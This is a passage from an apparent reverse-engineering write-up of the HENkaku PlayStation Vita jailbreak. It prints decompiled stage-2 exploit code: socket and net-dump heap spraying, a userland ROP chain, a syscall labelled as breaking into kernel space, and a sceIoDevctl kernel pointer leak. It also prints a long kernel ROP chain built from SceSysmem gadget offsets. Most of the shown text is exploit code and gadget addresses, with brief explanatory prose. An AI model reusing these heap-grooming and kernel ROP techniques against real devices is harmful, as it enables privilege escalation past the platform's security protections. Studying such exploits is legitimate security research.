	0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);

	// sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
	0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);

	// sceNetSocket("tst", AF_INET, 0x7, 0);
	0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);

	// Setup "mhm" ROP
	0x00(x_stack + 0x00008708) = 0x008DD9B5
	0x00(x_stack + 0x0000870C) = 0x000085C4
	0x00(x_stack + 0x00008710) = 0x10007300
	0x00(x_stack + 0x00008714) = 0x00000000
	0x00(x_stack + 0x00008718) = 0x00000000
	0x00(x_stack + 0x0000871C) = 0x00009F90
	0x00(x_stack + 0x00008720) = 0x00000000
	0x00(x_stack + 0x00008724) = 0x000FCDBB
	0x00(x_stack + 0x00008728) = 0x00008810
	0x00(x_stack + 0x0000872C) = 0x000059A9
	0x00(x_stack + 0x00008730) = 0x00000000
	0x00(x_stack + 0x00008734) = 0x00000519

	/*
	"mhm" ROP

	// Issue an IOCtl to "tst" FD
	int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);

	// Store IOCtl result
	0x00(x_stack + 0x00008810) = ioctl_res;

	// Deadlock
	sceWebkit_519();
	*/

	// Copy "mhm" ROP chain into "mhm" thread's stack
	memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);

	// Set stack pointer
	0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;

	// Set PC
	0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC}

	// sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0);
	0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);

	// Create several net dumps
	// sceNetDumpCreate("ddd", 0x00000F00, 0x00000000);
	0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000);
	0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);

	// Destroy some dumps
	sceNetDumpDestroy(x_stack + 0x000085F4);
	sceNetDumpDestroy(x_stack + 0x000085FC);
	sceNetDumpDestroy(x_stack + 0x00008604);
	sceNetDumpDestroy(x_stack + 0x0000860C);
	sceNetDumpDestroy(x_stack + 0x00008614);
	sceNetDumpDestroy(x_stack + 0x000085E8);

	// Create more net dumps
	sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000);
	sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);

	// Start "mhm" thread
	// Thread arguments are loaded into R1 and the gadget
	// at the thread's entrypoint then loads register values
	// from it, overwritting SP and PC and triggering the
	// ROP chain
	sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

	// Delay thread
	sceKernelDelayThread(1500000);

	// Close no longer needed sockets
	sceNetSyscallClose(x_stack + 0x00008470);
	sceNetSyscallClose(x_stack + 0x00008478);
	sceNetSyscallClose(x_stack + 0x00008480);
	sceNetSyscallClose(x_stack + 0x00008488);
	sceNetSyscallClose(x_stack + 0x00008490);
	sceNetSyscallClose(x_stack + 0x00008498);
	sceNetSyscallClose(x_stack + 0x000084A0);
	sceNetSyscallClose(x_stack + 0x000084A8);
	sceNetSyscallClose(x_stack + 0x000084B0);
	sceNetSyscallClose(x_stack + 0x000084B8);
	sceNetSyscallClose(x_stack + 0x000084C0);
	sceNetSyscallClose(x_stack + 0x000084C8);
	sceNetSyscallClose(x_stack + 0x000084D0);
	sceNetSyscallClose(x_stack + 0x000084D8);
	sceNetSyscallClose(x_stack + 0x000084E0);
	sceNetSyscallClose(x_stack + 0x000084E8);
	sceNetSyscallClose(x_stack + 0x000084F0);
	sceNetSyscallClose(x_stack + 0x000084F8);
	sceNetSyscallClose(x_stack + 0x00008500);
	sceNetSyscallClose(x_stack + 0x00008508);
	sceNetSyscallClose(x_stack + 0x00008510);
	sceNetSyscallClose(x_stack + 0x00008518);
	sceNetSyscallClose(x_stack + 0x00008520);
	sceNetSyscallClose(x_stack + 0x00008528);
	sceNetSyscallClose(x_stack + 0x00008530);
	sceNetSyscallClose(x_stack + 0x00008538);
	sceNetSyscallClose(x_stack + 0x00008540);
	sceNetSyscallClose(x_stack + 0x00008548);
	sceNetSyscallClose(x_stack + 0x00008550);
	sceNetSyscallClose(x_stack + 0x00008558);
	sceNetSyscallClose(x_stack + 0x00008560);
	sceNetSyscallClose(x_stack + 0x00008568);
	sceNetSyscallClose(x_stack + 0x00008570);
	sceNetSyscallClose(x_stack + 0x00008578);
	sceNetSyscallClose(x_stack + 0x00008580);
	sceNetSyscallClose(x_stack + 0x00008588);
	sceNetSyscallClose(x_stack + 0x00008590);
	sceNetSyscallClose(x_stack + 0x00008598);
	sceNetSyscallClose(x_stack + 0x000085A0);
	sceNetSyscallClose(x_stack + 0x000085A8);
	sceNetSyscallClose(x_stack + 0x000085C4);

	// Break into kernel space
	sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);

	// Destroy another dump
	sceNetDumpDestroy(x_stack + 0x000085DC);

	// Delay for a while
	sceKernelDelayThread(1000000);

	// Calculate a SceWebkit pointer using the ioctl
	// from "mhm" thread (kernel space?)
	r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;

	// Unknown
	sceWebkit_123();
	sceWebkit_CF481();

	// Destroy specific dumps (constant IDs)
	sceNetDumpDestroy(0x00001770);
	sceNetDumpDestroy(0x00001771);
	sceNetDumpDestroy(0x00001772);
	sceNetDumpDestroy(0x00001773);
	sceNetDumpDestroy(0x00001774);
	sceNetDumpDestroy(0x00001775);
	sceNetDumpDestroy(0x00001776);
	sceNetDumpDestroy(0x00001777);
	sceNetDumpDestroy(0x00001778);
	sceNetDumpDestroy(0x00001779);
	sceNetDumpDestroy(0x0000177A);
	sceNetDumpDestroy(0x0000177B);
	sceNetDumpDestroy(0x0000177C);
	sceNetDumpDestroy(0x0000177D);
	sceNetDumpDestroy(0x0000177E);
	sceNetDumpDestroy(0x0000177F);
	sceNetDumpDestroy(0x00001780);
	sceNetDumpDestroy(0x00001781);
	sceNetDumpDestroy(0x00001782);
	sceNetDumpDestroy(0x00001783);
	sceNetDumpDestroy(0x00001784);
	sceNetDumpDestroy(0x00001785);
	sceNetDumpDestroy(0x00001786);
	sceNetDumpDestroy(0x00001787);
	sceNetDumpDestroy(0x00001788);
	sceNetDumpDestroy(0x00001789);
	sceNetDumpDestroy(0x0000178A);
	sceNetDumpDestroy(0x0000178B);
	sceNetDumpDestroy(0x0000178C);
	sceNetDumpDestroy(0x0000178D);
	sceNetDumpDestroy(0x0000178E);
	sceNetDumpDestroy(0x0000178F);
	sceNetDumpDestroy(0x00001790);

	// Deadlock
	sceWebkit_519(0x00000000);

view raw henkaku_stage2.c hosted with ❤ by GitHub

Stage 2 leverages a bug in sceIoDevctl in order to leak 2 distinct kernel pointers. These 2 pointers refer, respectively, to SceSysmem module's base address and SceIoFilemgr(?) thread's stack address:

// Store leaked kernel pointer 1
// Comes from devctl_outbuf + 0x3D4

scesysmem_base = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9

// Store leaked kernel pointer 2

// Comes from devctl_outbuf + 0x3C4

sceiofilemgr_stack_base = 0x00(x_stack + 0x000072F8) + 0xFFFFF544

When preparing to write the kernel ROP chain, we can see a few pointers being set. These translate to:

// Kernel ROP inside sceiofilemgr
// This is where our ROP chain gets copied to inside the SceIoFilemgr module

kern_rop = sceiofilemgr_stack_base + 0x000006F8

// Encrypted kernel code

kern_code = kern_rop + 0x300

Now we write down our kernel ROP chain in the stack, but we can see that some values only get written afterwards.

This is because these values are directly related to the decryption of the next kernel level stage! Team molecule likely only writes them into the ROP chain later so they can easily update the encrypted stage without having to change the kernel ROP chain directly.

So:

// Overwrite specific NULLs in the ROP chain
0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC) // kern_code

0x00(x_stack + 0x00008B48) = 0x00000090

0x00(x_stack + 0x00008CC0) = 0x00000240

0x00(x_stack + 0x00008D58) = 0x00000200

0x00(x_stack + 0x00008D14) = 0x00008FC0 // kern_next_payload

And our final ROP chain should look like this:

	0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
	0x00(x_stack + 0x00008A90) = 0x08106803
	0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
	0x00(x_stack + 0x00008A98) = 0x00000038
	0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
	0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
	0x00(x_stack + 0x00008AAC) = 0x00000000
	0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
	0x00(x_stack + 0x00008AB4) = 0x00000000
	0x00(x_stack + 0x00008AB8) = scesysmem_base + 0x0001FC6D
	0x00(x_stack + 0x00008ABC) = scesysmem_base + 0x0000EA73
	0x00(x_stack + 0x00008AC0) = scesysmem_base + 0x00000031
	0x00(x_stack + 0x00008AC4) = scesysmem_base + 0x00027913
	0x00(x_stack + 0x00008AC8) = scesysmem_base + 0x0000A523
	0x00(x_stack + 0x00008ACC) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008AD0) = scesysmem_base + 0x00000CE3
	0x00(x_stack + 0x00008AD4) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008AD8) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008ADC) = scesysmem_base + 0x00000067
	0x00(x_stack + 0x00008AE0) = scesysmem_base + 0x0000587F
	0x00(x_stack + 0x00008AE4) = scesysmem_base + 0x00019713
	0x00(x_stack + 0x00008AE8) = scesysmem_base + 0x00001605
	0x00(x_stack + 0x00008AEC) = scesysmem_base + 0x00001E1D
	0x00(x_stack + 0x00008AF0) = 0x00000000
	0x00(x_stack + 0x00008AF4) = scesysmem_base + 0x0001EFE1
	0x00(x_stack + 0x00008AF8) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008AFC) = scesysmem_base + 0x00001603
	0x00(x_stack + 0x00008B00) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008B04) = scesysmem_base + 0x00001F17
	0x00(x_stack + 0x00008B08) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B0C) = scesysmem_base + 0x00000031
	0x00(x_stack + 0x00008B10) = scesysmem_base + 0x0000B913
	0x00(x_stack + 0x00008B14) = scesysmem_base + 0x00023B61
	0x00(x_stack + 0x00008B18) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B1C) = scesysmem_base + 0x000039EB
	0x00(x_stack + 0x00008B20) = scesysmem_base + 0x000232EB
	0x00(x_stack + 0x00008B24) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B28) = scesysmem_base + 0x0001B571
	0x00(x_stack + 0x00008B2C) = scesysmem_base + 0x00023B61
	0x00(x_stack + 0x00008B30) = scesysmem_base + 0x000232F1
	0x00(x_stack + 0x00008B34) = scesysmem_base + 0x00001411
	0x00(x_stack + 0x00008B38) = scesysmem_base + 0x00000AE1
	0x00(x_stack + 0x00008B3C) = scesysmem_base + 0x00000347
	0x00(x_stack + 0x00008B40) = scesysmem_base + 0x000050E9
	0x00(x_stack + 0x00008B44) = scesysmem_base + 0x00001411
	0x00(x_stack + 0x00008B48) = 0x00000090
	0x00(x_stack + 0x00008B4C) = scesysmem_base + 0x0001F2B1
	0x00(x_stack + 0x00008B50) = scesysmem_base + 0x00012B11
	0x00(x_stack + 0x00008B54) = scesysmem_base + 0x00000CE3
	0x00(x_stack + 0x00008B58) = scesysmem_base + 0x000000D1
